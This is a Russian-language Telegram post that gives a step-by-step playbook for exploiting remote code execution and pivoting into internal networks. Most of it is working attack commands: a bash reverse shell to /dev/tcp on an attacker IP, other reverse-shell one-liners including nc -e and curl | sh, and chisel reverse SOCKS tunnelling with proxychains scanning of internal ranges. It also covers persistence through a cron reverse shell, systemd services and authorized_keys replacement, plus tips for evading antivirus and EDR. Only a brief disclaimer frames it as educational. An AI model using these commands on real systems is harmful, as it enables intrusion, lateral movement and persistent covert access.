tg-me.com/hackproglib/4116
Last Update:
Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.nmap -p 80,443 --script http-vuln* <target_ip>
— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:curl "http://target.com/test.php?cmd=id"
⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.
Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'
— python3 -c 'import socket,os,...'
— php -r '...reverse shell...'
— perl, nc -e, curl | sh
— в зависимости от окруженияnc -lvnp 4444
Например, chisel:# На атакующей машине
chisel server -p 8000 --reverse# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks
⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)
Настрой файл /etc/proxychains.conf на:socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24
⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.
- cronjob: * * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1
- systemd: .service
с автозапуском
- загрузка агента Metasploit
- использование ssh-keygen
и подмена .ssh/authorized_keys
🧠 Примечания:
• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.
⚠️ Disclaimer:
Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.
#буст